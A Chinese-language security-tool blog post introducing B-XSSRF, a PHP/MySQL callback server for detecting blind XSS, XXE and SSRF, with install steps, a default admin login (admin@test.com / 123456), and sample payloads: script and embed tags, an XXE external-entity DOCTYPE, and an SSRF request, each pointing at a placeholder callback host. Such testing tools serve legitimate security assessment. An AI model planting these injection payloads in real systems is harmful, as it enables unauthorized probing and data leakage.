B-XSSRF:用于检测和跟踪Blind XSS,XXE和SSRF的工具包
- 发表于
- 安全工具
B-XSSRF介绍
XSSRF是一个用于检测和跟踪Blind XSS,XXE和SSRF的工具包,基于php+mysql的WEB端程序,它拥有简洁漂亮的界面。
XSSRF安装
下载源码
1 | git clone https://github.com/SpiderMate/B-XSSRF.git |
- 将文件上传到您的服务器。
- 创建一个数据库并将database.sql导入。
- 更改db.php文件中的DB信息。
- 准备好了。
XSSRF使用
BLIND XSS
1 2 | <embed src="http://mysite.com/bxssrf/request.php"> <script src="http://mysite.com/bxssrf/request.php"> |
BLIND XXE
1 2 3 4 5 | <?xml version="1.0" ?> <!DOCTYPE root [ <!ENTITY % ext SYSTEM "http://mysite.com/bxssrf/request.php"> %ext; ]> <r></r> |
SSRF
1 | GET /testssrf.php=http://mysite.com/bxssrf/request.php |
默认帐户
1 2 | USER : admin@test.com PASS : 123456 |
原文连接:B-XSSRF:用于检测和跟踪Blind XSS,XXE和SSRF的工具包 所有媒体,可在保留署名、
原文连接的情况下转载,若非则不得使用我方内容。
